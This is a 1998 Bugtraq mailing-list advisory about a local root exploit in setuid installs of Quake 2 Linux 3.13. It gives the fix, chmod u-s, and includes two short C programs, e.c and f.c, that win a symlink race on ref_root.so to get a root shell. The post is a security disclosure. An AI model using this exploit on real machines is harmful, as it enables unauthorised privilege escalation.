[prev in list] [next in list] [prev in thread] [next in thread]
List: bugtraq
Subject: Quake 2 Linux 3.13 - ref_root.so still works
From: kevingeo () CRUZIO ! COM
Date: 1998-02-25 13:49:10
[Download RAW message or body]
Vulnerable:
Everyone who followed the installation instructions and made Quake2 setuid
root.
Solution:
chmod u-s quake2.
Exploit:
In version 3.13, Quake2 trys to protect itself by checking the permissions
of a library before loading it. This just introduces a race condition.
Simply find a file that is owned by root and has 0700
permissions, call ref_root.so ref_root.real.so, run e.c (./e
/usr/games/quake2/ref_soft.so &, for example)
in background, and then run f.c. You'll have a root shell after a few
minutes.
e.c:
#include <unistd.h>
void main(int argc, char **argv) {
while(1) {
unlink("ref_root.so");
symlink(argv[1],"ref_root.so");
unlink("ref_root.so");
symlink("ref_root.real.so","ref_root.so");
}
}
f.c:
#include <stdlib.h>
void main() {
while (1) {
system("/usr/games/quake/quake2 +set vid_ref root");
}
}
[prev in list] [next in list] [prev in thread] [next in thread]
Configure |
About |
News |
Add a list |
Sponsored by KoreLogic